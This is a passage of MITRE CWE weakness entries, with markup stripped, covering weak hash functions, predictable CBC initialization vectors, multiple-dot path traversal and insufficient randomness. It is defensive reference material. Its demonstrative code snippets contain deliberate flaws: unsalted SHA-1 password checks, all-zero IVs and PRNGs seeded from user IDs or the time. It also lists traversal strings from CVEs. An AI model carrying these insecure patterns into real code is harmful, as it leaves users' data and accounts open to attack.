mitigations + + Using a Broken or Risky Cryptographic Algorithm + + + + The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack). + + A hash function is defined as an algorithm that maps arbitrarily sized data into a fixed-sized digest (output) such that the following properties hold: + + 1. The algorithm is not invertible (also called "one-way" or "not reversible") + 2. The algorithm is deterministic; the same input produces the same digest every time + + + Building on this definition, a cryptographic hash function must also ensure that a malicious actor cannot leverage the hash function to have a reasonable chance of success at determining any of the following: + + 1. the original input (preimage attack), given only the digest + 2. another input that can produce the same digest (2nd preimage attack), given the original input + 3. a set of two or more inputs that evaluate to the same digest (birthday attack), given the actor can arbitrarily choose the inputs to be hashed and can do so a reasonable amount of times + + What is regarded as "reasonable" varies by context and threat model, but in general, "reasonable" could cover any attack that is more efficient than brute force (i.e., on average, attempting half of all possible combinations). Note that some attacks might be more efficient than brute force but are still not regarded as achievable in the real world. + Any algorithm does not meet the above conditions will generally be considered weak for general use in hashing. + In addition to algorithmic weaknesses, a hash function can be made weak by using the hash in a security context that breaks its security guarantees. For example, using a hash function without a salt for storing passwords (that are sufficiently short) could enable an adversary to create a "rainbow table" [REF-637] to recover the password under certain conditions; this attack works against such hash functions as MD5, SHA-1, and SHA-2. + + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + + Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations ("stretching") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use. + Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead. + Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment's needs. + + High + + + + + In both of these examples, a user is logged in if their given password matches a stored password: + + unsigned char *check_passwd(char *plaintext) {ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); + //Login if hash matches stored hash + if (equal(ctext, secret_password())) {login_user();}} + + + String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance("SHA");encer.update(plainTextIn);byte[] digest = password.digest(); + //Login if hash matches stored hash + if (equal(digest,secret_password())) {login_user();} + + This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + At least one OT product used weak hashes. + + + + + CVE-2022-30320 + Programmable Logic Controller (PLC) uses a protocol with a cryptographically insecure hashing algorithm for passwords. + https://www.cve.org/CVERecord?id=CVE-2022-30320 + + + CVE-2005-4900 + SHA-1 algorithm is not collision-resistant. + https://www.cve.org/CVERecord?id=CVE-2005-4900 + + + CVE-2020-25685 + DNS product uses a weak hash (CRC32 or SHA-1) of the query name, allowing attacker to forge responses by computing domain names with the same hash. + https://www.cve.org/CVERecord?id=CVE-2020-25685 + + + CVE-2012-6707 + blogging product uses MD5-based algorithm for passwords. + https://www.cve.org/CVERecord?id=CVE-2012-6707 + + + CVE-2019-14855 + forging of certificate signatures using SHA-1 collisions. + https://www.cve.org/CVERecord?id=CVE-2019-14855 + + + CVE-2017-15999 + mobile app for backup sends SHA-1 hash of password in cleartext. + https://www.cve.org/CVERecord?id=CVE-2017-15999 + + + CVE-2006-4068 + Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks. + https://www.cve.org/CVERecord?id=CVE-2006-4068 + + + + + Reversible One-Way Hash + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Since CWE 4.4, various cryptography-related entries including CWE-328 have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, References + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Description, Maintenance_Notes, Name, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Reversible One-Way Hash + + + + The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key. + + CBC mode eliminates a weakness of Electronic Code + Book (ECB) mode by allowing identical plaintext blocks to + be encrypted to different ciphertext blocks. This is + possible by the XOR-ing of an IV with the initial plaintext + block so that every plaintext block in the chain is XOR'd + with a different value before encryption. If IVs are + reused, then identical plaintexts would be encrypted to + identical ciphertexts. However, even if IVs are not + identical but are predictable, then they still break the + security of CBC mode against Chosen Plaintext Attacks + (CPA). + + + + + + + + + + + + CBC mode is a commonly used mode of operation for a + block cipher. It works by XOR-ing an IV with the initial + block of a plaintext prior to encryption and then + XOR-ing each successive block of plaintext with the + previous block of ciphertext before encryption. + + C_0 = IV + C_i = E_k{M_i XOR C_{i-1}} + + + When used properly, CBC mode provides security against + chosen plaintext attacks. Having an unpredictable IV + is a crucial underpinning of this. See [REF-1171]. + + + + + Implementation + Developers might dismiss the importance of an unpredictable IV and choose an easier implementation to save effort, weakening the scheme in the process. + + + Medium + + + Confidentiality + Read Application Data + If the IV is not properly initialized, data that is encrypted can be compromised and leak information. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + NIST recommends two methods of generating unpredictable IVs for CBC mode [REF-1172]. The first is to generate the IV randomly. The second method is to encrypt a nonce with the same key and cipher to be used to encrypt the plaintext. In this case the nonce must be unique but can be predictable, since the block cipher will act as a pseudo random permutation. + + + + + In the following examples, CBC mode is used when encrypting data: + + EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&ctx,EVP_bf_cbc(), key,iv); + + + public class SymmetricCipherTest { + public static void main() { + + byte[] text ="Secret".getBytes();byte[] iv ={0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};KeyGenerator kg = KeyGenerator.getInstance("DES");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes); + } + } + + In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack. + + + + + CVE-2020-5408 + encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality + https://www.cve.org/CVERecord?id=CVE-2020-5408 + + + CVE-2017-17704 + messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart + https://www.cve.org/CVERecord?id=CVE-2017-17704 + + + CVE-2017-11133 + application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong. + https://www.cve.org/CVERecord?id=CVE-2017-11133 + + + CVE-2007-3528 + Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values. + https://www.cve.org/CVERecord?id=CVE-2007-3528 + + + CVE-2011-3389 + BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack. + https://www.cve.org/CVERecord?id=CVE-2011-3389 + + + + Cryptography + + + + Not using a random IV with CBC mode + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Background_Details, Common_Consequences, Functional_Areas, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-06-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Description, Maintenance_Notes, Name, References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Modes_of_Introduction, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Not Using a Random IV with CBC Mode + Not Using an Unpredictable IV with CBC Mode + + + + The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....' (multiple dot) sequences that can resolve to a location that is outside of that directory. + + This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. + The '....' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to "..\..\.." and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of "./" sequences, can ultimately produce valid ".." sequences due to a collapse into unsafe value (CWE-182). + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2000-0240 + read files via "/........../" in URL + https://www.cve.org/CVERecord?id=CVE-2000-0240 + + + CVE-2000-0773 + read files via "...." in web server + https://www.cve.org/CVERecord?id=CVE-2000-0773 + + + CVE-1999-1082 + read files via "......" in web server (doubled triple dot?) + https://www.cve.org/CVERecord?id=CVE-1999-1082 + + + CVE-2004-2121 + read files via "......" in web server (doubled triple dot?) + https://www.cve.org/CVERecord?id=CVE-2004-2121 + + + CVE-2001-0491 + multiple attacks using "..", "...", and "...." in different commands + https://www.cve.org/CVERecord?id=CVE-2001-0491 + + + CVE-2001-0615 + "..." or "...." in chat server + https://www.cve.org/CVERecord?id=CVE-2001-0615 + + + + + '....' (multiple dot) + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Like the triple-dot CWE-32, this manipulation probably hides multiple weaknesses that should be made more explicit. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Multiple Dot - '....' + + + + The product uses insufficiently random numbers or values in a security context that depends on unpredictable numbers. + When product generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information. + + + + + + + Primary + + + + + + + + Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated. There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a value to be cryptographically secure, it must be impossible or highly improbable for an attacker to distinguish between it and a truly random value. + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Confidentiality + Other + Other + When a protection mechanism relies on random values to restrict access to a sensitive resource, such as a session ID or a seed for generating a cryptographic key, then the resource being protected could be accessed by guessing the ID or key. + + + Access Control + Other + Bypass Protection Mechanism + Other + If product relies on unique, unguessable IDs to identify a resource, an attacker might be able to guess an ID for a resource that is owned by another user. The attacker could then read the resource, or pre-create a resource with the same ID to prevent the legitimate program from properly sending the resource to the intended user. For example, a product might maintain session information in a file whose name is based on a username. An attacker could pre-create this file for a victim user, then set the permissions so that the application cannot generate the session for the victim, preventing the victim from using the application. + + + Access Control + Bypass Protection Mechanism + Gain Privileges or Assume Identity + When an authorization or authentication mechanism relies on random values to restrict access to restricted functionality, such as a session ID or a seed for generating a cryptographic key, then an attacker may access the restricted functionality by guessing the ID or key. + + + + + Black Box + + Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process and look for library functions that indicate when randomness is being used. Run the process multiple times to see if the seed changes. Look for accesses of devices or equivalent resources that are commonly used for strong (or weak) randomness, such as /dev/urandom on Linux. Look for library or system calls that access predictable information such as process IDs and system time. + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Man-in-the-middle attack tool + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + + Use a well-vetted algorithm that is currently considered to be strong by experts in the field, and select well-tested implementations with adequate length seeds. + In general, if a pseudo-random number generator is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be used in security-sensitive contexts. + Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a "random enough" number. + + + + Implementation + Consider a PRNG that re-seeds itself as needed from high quality pseudo-random output sources, such as hardware devices. + + + Testing + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). + + + Testing + Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + + + This code attempts to generate a unique random identifier for a user's session. + + function generateSessionID($userID){srand($userID);return rand();} + + Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. + This example also exhibits a Small Seed Space (CWE-339). + + + The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase. + + String GenerateReceiptURL(String baseUrl) {Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + ".html");} + + This code uses the Random.nextInt() function to generate "unique" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG. + + + + + CVE-2020-7010 + Cloud application on Kubernetes generates passwords using a weak random number generator based on deployment time. + https://www.cve.org/CVERecord?id=CVE-2020-7010 + + + CVE-2009-3278 + Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks. + https://www.cve.org/CVERecord?id=CVE-2009-3278 + + + CVE-2009-3238 + Random number generator can repeatedly generate the same value. + https://www.cve.org/CVERecord?id=CVE-2009-3238 + + + CVE-2009-2367 + Web application generates predictable session IDs, allowing session hijacking. + https://www.cve.org/CVERecord?id=CVE-2009-2367 + + + CVE-2009-2158 + Password recovery utility generates a relatively small number of random passwords, simplifying brute force attacks. + https://www.cve.org/CVERecord?id=CVE-2009-2158 + + + CVE-2009-0255 + Cryptographic key created with a seed based on the system time. + https://www.cve.org/CVERecord?id=CVE-2009-0255 + + + CVE-2008-5162 + Kernel function does not have a good entropy source just after boot. + https://www.cve.org/CVERecord?id=CVE-2008-5162 + + + CVE-2008-4905 + Blogging software uses a hard-coded salt when calculating a password hash. + https://www.cve.org/CVERecord?id=CVE-2008-4905 + + + CVE-2008-4929 + Bulletin board application uses insufficiently random names for uploaded files, allowing other users to access private files. + https://www.cve.org/CVERecord?id=CVE-2008-4929 + + + CVE-2008-3612 + Handheld device uses predictable TCP sequence numbers, allowing spoofing or hijacking of TCP connections. + https://www.cve.org/CVERecord?id=CVE-2008-3612 + + + CVE-2008-2433 + Web management console generates session IDs based on the login time, making it easier to conduct session hijacking. + https://www.cve.org/CVERecord?id=CVE-2008-2433 + + + CVE-2008-0166 + SSL library uses a weak random number generator that only generates 65,536 unique keys. + https://www.cve.org/CVERecord?id=CVE-2008-0166 + + + CVE-2008-2108 + Chain: insufficient precision causes extra zero bits to be assigned, reducing entropy for an API function that generates random numbers. + https://www.cve.org/CVERecord?id=CVE-2008-2108 + + + CVE-2008-2108 + Chain: insufficient precision (CWE-1339) in + random-number generator causes some zero bits to be reliably + generated, reducing the amount of entropy (CWE-331) + https://www.cve.org/CVERecord?id=CVE-2008-2108 + + + CVE-2008-2020 + CAPTCHA implementation does not produce enough different images, allowing bypass using a database of all possible checksums. + https://www.cve.org/CVERecord?id=CVE-2008-2020 + + + CVE-2008-0087 + DNS client uses predictable DNS transaction IDs, allowing DNS spoofing. + https://www.cve.org/CVERecord?id=CVE-2008-0087 + + + CVE-2008-0141 + Application generates passwords that are based on the time of day. + https://www.cve.org/CVERecord?id=CVE-2008-0141 + + + + Cryptography + Authentication + Session Management + + + + Randomness and Predictability + + + Insecure Randomness + + + A2 + Broken Access Control + CWE More Specific + + + CON33-C + Avoid race conditions when using library functions + Imprecise + + + MSC30-C + Do not use the rand() function for generating pseudorandom numbers + CWE More Abstract + + + MSC32-C + Properly seed pseudorandom number generators + CWE More Abstract + + + 11 + Brute Force + + + 18 + Credential/Session Prediction + + + MSC02-J + Generate strong random numbers + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This can be primary to many other weaknesses such as cryptographic errors, authentication errors, symlink following, information leaks, and others. + + As of CWE 4.3, CWE-330 and its descendants are being + investigated by the CWE crypto team to identify gaps + related to randomness and unpredictability, as well as + the relationships between randomness and cryptographic + primitives. This "subtree analysis" might + result in the addition or deprecation of existing + entries; the reorganization of relationships in some + views, e.g. the research view (CWE-1000); more consistent + use of terminology; and/or significant modifications to + related entries. + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Background_Details, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Likelihood_of_Exploit, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Common_Consequences, Description, Observed_Examples, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Detection_Factors, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Functional_Areas, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Description, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Maintenance_Notes, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Randomness and Predictability + + + + The product uses an algorithm or scheme that produces insufficient entropy, leaving patterns or clusters of values that are more likely to occur than others. + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Other + Bypass Protection Mechanism + Other + An attacker could guess the random numbers generated and could gain unauthorized access to a system if the random numbers are used for authentication and authorization. + + + + + Implementation + Determine the necessary entropy to adequately provide for randomness and predictability. This can be achieved by increasing the number of bits of objects such as keys and seeds. + + + + + This code generates a unique random identifier for a user's session. + + function generateSessionID($userID){srand($userID);return rand();} + + Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. + This example also exhibits a Small Seed Space (CWE-339). + + + The following code uses a statistical PRNG to create a URL for a receipt that remains active for some period of time after a purchase. + + String GenerateReceiptURL(String baseUrl) {Random ranGen = new Random();ranGen.setSeed((new Date()).getTime());return(baseUrl + ranGen.nextInt(400000000) + ".html");} + + This code uses the Random.nextInt() function to generate "unique" identifiers for the receipt pages it generates. Because Random.nextInt() is a statistical PRNG, it is easy for an attacker to guess the strings it generates. Although the underlying design of the receipt system is also 